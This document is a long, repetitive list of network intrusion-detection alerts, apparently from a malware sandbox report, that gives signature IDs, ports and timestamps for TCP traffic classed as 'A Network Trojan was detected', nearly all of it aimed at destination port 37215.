              SID:2835222
              Source Port:45562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057906
              SID:2829579
              Source Port:46792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510357
              SID:2829579
              Source Port:50302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487621
              SID:2829579
              Source Port:43624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194674
              SID:2829579
              Source Port:51710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318558
              SID:2835222
              Source Port:49932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213320
              SID:2835222
              Source Port:54542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272170
              SID:2829579
              Source Port:57574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913414
              SID:2829579
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370369
              SID:2829579
              Source Port:46390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178026
              SID:2835222
              Source Port:55784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458151
              SID:2835222
              Source Port:35776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677946
              SID:2829579
              Source Port:38104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787934
              SID:2829579
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178736
              SID:2835222
              Source Port:44390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248742
              SID:2835222
              Source Port:34976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.907928
              SID:2829579
              Source Port:58986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055350
              SID:2829579
              Source Port:58712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041046
              SID:2835222
              Source Port:56740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359128
              SID:2835222
              Source Port:42644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191062
              SID:2835222
              Source Port:40442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406015
              SID:2835222
              Source Port:48604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823899
              SID:2829579
              Source Port:33760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453511
              SID:2829579
              Source Port:36202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820137
              SID:2829579
              Source Port:59608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267003
              SID:2835222
              Source Port:33422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160785
              SID:2835222
              Source Port:52926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.454386
              SID:2835222
              Source Port:52170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278817
              SID:2829579
              Source Port:39440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.269130
              SID:2835222
              Source Port:58560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752588
              SID:2829579
              Source Port:58798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942264
              SID:2835222
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871996
              SID:2829579
              Source Port:43690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176532
              SID:2835222
              Source Port:55026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938097
              SID:2829579
              Source Port:53390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636213
              SID:2835222
              Source Port:45974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749014
              SID:2829579
              Source Port:38702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374887
              SID:2835222
              Source Port:52398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678828
              SID:2829579
              Source Port:44462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344363
              SID:2835222
              Source Port:47974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988032
              SID:2835222
              Source Port:58372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.819566
              SID:2829579
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027174
              SID:2829579
              Source Port:49682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545751
              SID:2835222
              Source Port:53206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525923
              SID:2829579
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301649
              SID:2829579
              Source Port:41988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028104
              SID:2829579
              Source Port:34350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709739
              SID:2829579
              Source Port:37376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.319987
              SID:2829579
              Source Port:42848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453971
              SID:2829579
              Source Port:42032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659290
              SID:2835222
              Source Port:47356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836409
              SID:2835222
              Source Port:47144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253992
              SID:2835222
              Source Port:47574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.935425
              SID:2829579
              Source Port:45022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213421
              SID:2835222
              Source Port:46936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564781
              SID:2829579
              Source Port:37304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725751
              SID:2829579
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252279
              SID:2835222
              Source Port:42194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401261
              SID:2835222
              Source Port:57338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997108
              SID:2829579
              Source Port:47894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046149
              SID:2829579
              Source Port:39830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152995
              SID:2835222
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802157
              SID:2829579
              Source Port:55460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317942
              SID:2835222
              Source Port:49232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872332
              SID:2835222
              Source Port:56656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091932
              SID:2829579
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452067
              SID:2829579
              Source Port:40938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378079
              SID:2835222
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369906
              SID:2835222
              Source Port:39312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042813
              SID:2829579
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307304
              SID:2835222
              Source Port:50008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094733
              SID:2829579
              Source Port:45970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192314
              SID:2829579
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346106
              SID:2835222
              Source Port:38542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913308
              SID:2835222
              Source Port:48474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128959
              SID:2829579
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156473
              SID:2835222
              Source Port:36766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028466
              SID:2829579
              Source Port:60660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127147
              SID:2829579
              Source Port:52000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404051
              SID:2835222
              Source Port:54902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697434
              SID:2835222
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166161
              SID:2835222
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355917
              SID:2835222
              Source Port:44616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726758
              SID:2835222
              Source Port:34786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092411
              SID:2835222
              Source Port:35904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222980
              SID:2835222
              Source Port:43350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212998
              SID:2835222
              Source Port:59576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403082
              SID:2835222
              Source Port:50826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678311
              SID:2835222
              Source Port:40840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191880
              SID:2835222
              Source Port:54088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169062
              SID:2829579
              Source Port:34910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526214
              SID:2835222
              Source Port:49756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309357
              SID:2835222
              Source Port:60692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991362
              SID:2835222
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303607
              SID:2835222
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409430
              SID:2835222
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568688
              SID:2835222
              Source Port:53006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195612
              SID:2829579
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.792167
              SID:2829579
              Source Port:44438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823265
              SID:2835222
              Source Port:41650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839664
              SID:2835222
              Source Port:56842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989692
              SID:2829579
              Source Port:36226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510378
              SID:2835222
              Source Port:45936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016679
              SID:2835222
              Source Port:54202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221469
              SID:2835222
              Source Port:37994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785195
              SID:2835222
              Source Port:48574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868092
              SID:2829579
              Source Port:40250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.015907
              SID:2835222
              Source Port:52846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127401
              SID:2835222
              Source Port:33346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510238
              SID:2835222
              Source Port:40892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696752
              SID:2835222
              Source Port:44152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783207
              SID:2835222
              Source Port:48548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265714
              SID:2835222
              Source Port:43404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195647
              SID:2835222
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617758
              SID:2829579
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198778
              SID:2835222
              Source Port:38868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.754484
              SID:2835222
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488525
              SID:2829579
              Source Port:40468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.149176
              SID:2829579
              Source Port:43164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254321
              SID:2829579
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547240
              SID:2829579
              Source Port:50358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252164
              SID:2835222
              Source Port:57412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660885
              SID:2829579
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.994260
              SID:2829579
              Source Port:33534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275739
              SID:2835222
              Source Port:59776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527889
              SID:2835222
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213507
              SID:2829579
              Source Port:58106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730021
              SID:2835222
              Source Port:50366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887378
              SID:2835222
              Source Port:56830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545486
              SID:2829579
              Source Port:33026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040345
              SID:2829579
              Source Port:47882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457504
              SID:2835222
              Source Port:47670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609797
              SID:2829579
              Source Port:58734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.950146
              SID:2835222
              Source Port:43064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708220
              SID:2829579
              Source Port:48586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953726
              SID:2829579
              Source Port:45558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990518
              SID:2829579
              Source Port:34774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026335
              SID:2835222
              Source Port:34528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451487
              SID:2835222
              Source Port:36072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509917
              SID:2829579
              Source Port:49476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218454
              SID:2829579
              Source Port:36260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323418
              SID:2829579
              Source Port:48012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454731
              SID:2829579
              Source Port:50814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257930
              SID:2829579
              Source Port:45166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:27.318931
              SID:2840515
              Source Port:54210
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507830
              SID:2829579
              Source Port:45812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404821
              SID:2835222
              Source Port:57438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460045
              SID:2835222
              Source Port:38642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783633
              SID:2835222
              Source Port:58496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025319
              SID:2829579
              Source Port:35258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043070
              SID:2829579
              Source Port:43386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820200
              SID:2829579
              Source Port:39152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180916
              SID:2829579
              Source Port:33502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753662
              SID:2835222
              Source Port:60164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177114
              SID:2835222
              Source Port:37758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087049
              SID:2835222
              Source Port:42320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508749
              SID:2835222
              Source Port:53606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159969
              SID:2829579
              Source Port:38420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060931
              SID:2829579
              Source Port:45330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.404978
              SID:2829579
              Source Port:55854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457500
              SID:2835222
              Source Port:54914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359532
              SID:2835222
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177971
              SID:2835222
              Source Port:35478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424540
              SID:2835222
              Source Port:50432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093372
              SID:2829579
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028848
              SID:2829579
              Source Port:51846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193305
              SID:2829579
              Source Port:57762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421180
              SID:2835222
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137648
              SID:2835222
              Source Port:57552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168527
              SID:2835222
              Source Port:60994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318158
              SID:2835222
              Source Port:39306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822139
              SID:2835222
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220011
              SID:2829579
              Source Port:46140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757412
              SID:2835222
              Source Port:38920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552340
              SID:2835222
              Source Port:50046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872608
              SID:2829579
              Source Port:53446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823295
              SID:2835222
              Source Port:57952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348912
              SID:2835222
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751938
              SID:2835222
              Source Port:43434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374446
              SID:2829579
              Source Port:57612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218860
              SID:2829579
              Source Port:52672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932698
              SID:2829579
              Source Port:38906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177865
              SID:2835222
              Source Port:37490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611328
              SID:2835222
              Source Port:45628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177678
              SID:2829579
              Source Port:36830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176969
              SID:2829579
              Source Port:43688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486707
              SID:2829579
              Source Port:42080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696107
              SID:2835222
              Source Port:34868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730522
              SID:2835222
              Source Port:43946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377705
              SID:2835222
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783681
              SID:2829579
              Source Port:55150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175243
              SID:2829579
              Source Port:52638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508245
              SID:2829579
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438941
              SID:2835222
              Source Port:53576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307892
              SID:2829579
              Source Port:60690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488777
              SID:2835222
              Source Port:48024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093868
              SID:2835222
              Source Port:34834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614397
              SID:2829579
              Source Port:39046
              Destination Port:37215
